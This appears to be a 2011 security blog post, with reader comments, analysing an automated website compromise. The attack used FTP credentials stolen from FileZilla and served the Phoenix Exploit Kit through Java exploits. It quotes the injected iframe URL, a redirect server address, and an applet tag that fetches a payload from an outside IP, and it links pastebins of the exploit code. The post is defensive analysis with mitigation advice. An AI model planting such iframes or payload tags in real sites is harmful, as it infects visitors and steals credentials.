Home > Security > Automated attacks since 12/2010 using compromised credentials / chain reaction

Automated attacks since 12/2010 using compromised credentials / chain reaction


Is your browser giving you a content warning while accessing legitimate websites? You get a virus warning while reading your favorite online newspaper? Here is why:

In october 2010 a “feature” was disclosed that Filezilla caches credentials silently in a XML document. This feature was 0-day before and has been used since then by malware to collect user credentials. Today, there might be a collection of some million compromised records.

Since December 2010, compromised websites are upcoming which are an evidence for an automated mass hack. For this hack it doesnt matter which OS, service or application (cms, joomla) is installed as long as the access password wasn’t changed. So every content can be changed, even save-known, non-active pages like html.

The attack starts with the used protocol, in this example via FTP. The bot starts to retrieve every existing index.* file on server and includes an (hidden) iframe:

http://80.91.191.158/stats/priemIframe.php?hashftp=05f5b2944edd017d509cd3b92bfa7f69&hashpage=0d803ee4896cf18a80a781bb7e308ffd

The files are then uploaded again, together with a PHP Shell and a blackhat-seo framework.

This server based in Ukraine seems to be a counter and decision server. Depending on the OS and used browser the client ist then redirected to a different server. Here a server in Austria:

http://oiewr4.at/gas/dnitezhpyokwhnhwglb2.php

The access is checked for a valid referer (you have to come from the counter server to get content). On a direkt access the php is empty. It strongly depends on the used browser, version and OS which content you reveive. (An up-to-date Firefox blocks the austrian domain immediately due to reports)

When the check is disabled/an older browser is used, and you are using Java you receive the following

<applet mayscript=’true’ archive=’jzdlgoazhzfvkli3.jar’ code=’a.class’><param name=’trigger’ value=’isie’><param name=’url’ valuetype=’ref’ value=’http:/178.162.229.52/gas/dseriwyubrjmkma.bin’></applet><body id=’jpyvaq9′ name=’jpyvaq9′></body>

This Java code uses two different kinds of the sound/midi exploit to infect the client (this IP address is based in India).

Now see how “good” these two “old” java exploits are detected by up-to-date antivirus scanners, only 4 out of 47 detect the malware:

http://www.virustotal.com/file-scan/report.html?id=d72d92174…

http://www.virustotal.com/file-scan/report.html?id=bad21728c…

Here is the link to the pastebin with the malicious code:

http://pastebin.com/TRWGyCfB

Here is the code deobfusicated:

http://pastebin.com/yHHnS64s

You now can easily see the exploited vulnerabilites.

This seems to be the Phoenix Exploit Kit

The Phoenix Exploit Kit includes exploits for the following vulnerabilities:

Flash exploits

Adobe Flash Integer Overflow in AVM2 – CVE-2009-1869
Adobe Flash Integer Overflow in Flash Player CVE-2007-0071

PDF exploits

Adobe Reader CollectEmailInfo Vulnerability CVE-2007-5659
Adobe Reader Collab GetIcon Vulnerability CVE-2009-0927
Adobe Reader LibTiff Vulnerability CVE-2010-0188
Adobe Reader newPlayer Vulnerability CVE-2009-4324
Adobe Reader util.printf Vulnerability CVE-2008-2992

Internet Explorer Exploits

IE MDAC Vulnerability CVE-2006-0003
IE SnapShot Viewer ActiveX Vulnerability CVE-2008-2463
IE iepeers Vulnerability CVE-2010-0806

Java Exploits
JAVA HsbParser.getSoundBank Vulnerability CVE-2009-3867
Java Development Kit Vulnerability CVE-2008-5353

 

I was too slow to decrpyt the script to be able to download the files as the servers have been shutdown in between (half a day).

But these exploits will definately try to drop a (or more) trojan(s) then, search the compromised user account for saved passwords, and might also hook into the browsers to get credentials directly, which then will be submitted to a server, which will be used to compromise the next server. And it goes on and on…

As you can see, even a good virusscanner might allow the trojan to be run. So don’t feel save.

  1. Don’t use filezilla
  2. Never save credentials in the browser
  3. Don’t use Internet Explorer
  4. Keep your OS, Browser and third-party software (Adobe Flash, Java..) up-to-date
  5. Perodically change your passwords
  6. Use security browser plugins like adblockplus and noscript
Advertisements
  1. Kai-AchimBruder
    2011/01/22 at 2:03 am

    Hello

    and many thanks for this article. Now I know why 20 of my websites are off.

    I’m/was using filezilla and I have this in all my index.php/html

    hxxp://80.91.191.158/stats/priemIframe.php?part=2&hashftp=###&hashpage=###

    Is there any way to clean all the index.php/html of the hacked websites?

    Greetings Kai

    • 2011/01/22 at 10:24 am

      Hi Kai,

      first, change all your passwords. If you really want to continue using filezilla, disable the password save. You have to change the “Kiosk Mode” in the fzdefaults.xml for doing so
      Best would be to flush all the contents of your webservers and upload a uncompromised backup.

      Otherwise, delete the lines out of your index files, check your FTP Logs on your servers which files have been uploaded and delete them all (it should be a phpshell and a folder containing Blackhat-SEO stuff).

      I will drop you an email if you need more support.

      Best Regards,

      Andre

  2. 2011/01/24 at 3:31 pm

    i wrote a little php script, that can be run from console or web to repair the infected files:

    Edit: (Script moved to article https://integer13.wordpress.com/2011/01/24/update-on-priemiframe-hacks/, Thanks for the submission)

  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: